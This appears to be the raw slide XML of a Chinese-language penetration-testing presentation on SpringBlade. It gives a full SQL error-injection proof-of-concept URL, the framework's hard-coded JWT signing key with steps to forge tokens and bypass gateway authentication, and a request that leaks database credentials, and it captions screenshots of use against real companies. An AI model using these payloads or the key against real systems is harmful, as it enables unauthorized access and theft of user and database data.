      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="矩形 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6598096" y="2514157"/>
            <a:ext cx="4160846" cy="10291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HEAD</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="矩形 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6598096" y="3519186"/>
            <a:ext cx="4172654" cy="221482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BODY</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="文本框 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2514622" y="1507254"/>
            <a:ext cx="1274708" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>源码</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="文本框 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8041165" y="1423290"/>
            <a:ext cx="1274708" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>结构</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="文本框 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6756400" y="5918200"/>
            <a:ext cx="3493264" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>结构都是有</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>HEAD</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>BODY</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="流程 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="393540" y="2219512"/>
            <a:ext cx="5474826" cy="3371059"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartProcess">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="bg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/blade-user/export-user</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如果能过去到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>token </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>可以在浏览器中通过增加</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>blade-auth={token}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的方式加上</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>updatexml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的方式进行报错注入。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>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en-US" altLang="zh-CN"/>
              <a:t>POC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>请求方式：GET</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>完整POC：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>http://{ip}:{port}/api/blade-user/export-user?blade-auth=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>{token}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>&amp;account=&amp;realName=&amp;updatexml(1,concat(0x7e,user(),0x7e),1)=1</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2" descr="browser-export-user SQL 注入漏洞"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="213360" y="2040255"/>
            <a:ext cx="11765915" cy="2157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4270375" cy="5100320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>整体思路：由于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Spring-Blade</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>V3.2.0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>中将密钥硬编码到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Blade-Tools</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>基础架构中，而且</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Spring-Blade</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>又依赖了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>BladeTools</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>所以导致在老版本的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Blade</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>中可以利用硬编码的密钥进行伪造</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>JWT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>导致权限的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>绕过。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>硬编码的密钥</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>为：bladexisapowerfulmicroservicearchitectureupgradedandoptimizedfromacommercialproject</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>先根据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>密钥生成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>JWT</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2" descr="JWT官网生成"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4911725" y="1508125"/>
            <a:ext cx="6049010" cy="4574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093845" y="1220470"/>
            <a:ext cx="6946265" cy="5451475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="106045" y="1155700"/>
            <a:ext cx="3909060" cy="5476240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>burp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>进行抓包并增加</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Blade-Auth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>字段，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>值为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> bearer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>生成的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>虽然返回报错其实该请求已经通过网关打入服务</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>了。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>请求的路径</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>为：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>/api/blade-user/user-list</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>上述路径的请求过程应该为：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、前端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Vue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>gateWay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>网关目的是对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>JWT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>进行鉴权，如果能过则直接放行。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、由于请求的是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>blade-user则网关则会将请求推给</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>服务，然后</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>根据user-list找对应的接口，执行业务</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>逻辑。</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该</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>已经然后鉴权直接放行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>了。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2" descr="完整demo项目JWT伪造GateWayApplication服务鉴权绕过"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="474345" y="1724025"/>
            <a:ext cx="9168130" cy="4467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88265" y="1212850"/>
            <a:ext cx="3122930" cy="5101590"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>可以看到伪造的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>JWT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>绕过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>gateWay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的鉴权放行之后来到了对应的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>User</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>模块下的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>user-list</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>接口中，说明伪造的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>JWT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>是生效的。这里的报错是数据库没有数据等问题，并不影响做渗透</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>测试。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3211195" y="1102995"/>
            <a:ext cx="8535670" cy="5211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r>
              <a:rPr lang="en-US" altLang="zh-CN" spc="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>泄露数据库账号密码</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88265" y="1212850"/>
            <a:ext cx="4768850" cy="5171440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>利用伪造</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>JWT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>构造</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Blade-Auth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>来进行访问：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>POC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>http://{IP}:{Port}/api/blade-develop/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>datasource</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>/list</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4602480" y="1212850"/>
            <a:ext cx="6612890" cy="5347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企业</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" spc="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>2</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88265" y="1212850"/>
            <a:ext cx="11631295" cy="865505"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>真实企业渗透</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>测试</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4" descr="真实企业JWT伪造获取userlist接口所有信息"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1191895" y="1671955"/>
            <a:ext cx="8604250" cy="5040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企业</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" spc="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>1</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88265" y="1212850"/>
            <a:ext cx="11631295" cy="865505"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>真实企业渗透</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>测试</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2" descr="实战JWT伪造2企业"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3253740" y="1285875"/>
            <a:ext cx="7331710" cy="5154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企业</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" spc="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>3</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88265" y="1212850"/>
            <a:ext cx="11631295" cy="865505"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>真实企业渗透</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>测试</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4" descr="实战JWT伪造"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2247265" y="1212850"/>
            <a:ext cx="9799320" cy="5121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04</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:t>源码</a:t>
            </a:r>
            <a:r>
              <a:t>分析</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sym typeface="+mn-ea"/>
